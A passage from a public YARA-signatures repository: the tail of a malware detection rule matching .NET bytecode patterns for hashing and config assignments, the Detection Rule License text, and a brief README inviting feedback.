16 |         $byte_md5_hash = { 7e [3] 04 28 [3] 06 6f } // CIL: ldsfld <Field>; call <MethodDef>; callvirt — per the name, MD5 hashing of a static value
17 |         $patt_config = { 72 [3] 70 80 [3] 04 } // CIL: ldstr <#US token>; stsfld <Field> — one per config option, counted below
18 |
19 |     condition:
20 |         5 of them and #patt_config >= 5 // five indicators AND at least five config assignments
21 | }
22 |
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | # Detection Rule License (DRL) 1.1
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this rule set and associated documentation files (the "Rules"), to deal in the Rules without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Rules, and to permit persons to whom the Rules are furnished to do so, subject to the following conditions:
4 |
5 | If you share the Rules (including in modified form), you must retain the following if it is supplied within the Rules:
6 |
7 | 1. identification of the authors(s) ("author" field) of the Rule and any others designated to receive attribution, in any reasonable manner requested by the Rule author (including by pseudonym if designated).
8 |
9 | 2. a URI or hyperlink to the Rule set or explicit Rule to the extent reasonably practicable
10 |
11 | 3. 
indicate the Rules are licensed under this Detection Rule License, and include the text of, or the URI or hyperlink to, this Detection Rule License to the extent reasonably practicable 12 | 13 | If you use the Rules (including in modified form) on data, messages based on matches with the Rules must retain the following if it is supplied within the Rules: 14 | 15 | 1. identification of the authors(s) ("author" field) of the Rule and any others designated to receive attribution, in any reasonable manner requested by the Rule author (including by pseudonym if designated). 16 | 17 | THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES. 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # YARA-Signatures 2 | A collection of my public YARA signatures for various malware families. 3 | 4 | I am always looking for feedback, corrections, additions, tips, and lessons learned. 5 | 6 | The easiest way to get the above to me is [via Twitter](https://twitter.com/jeFF0Falltrades). 7 | --------------------------------------------------------------------------------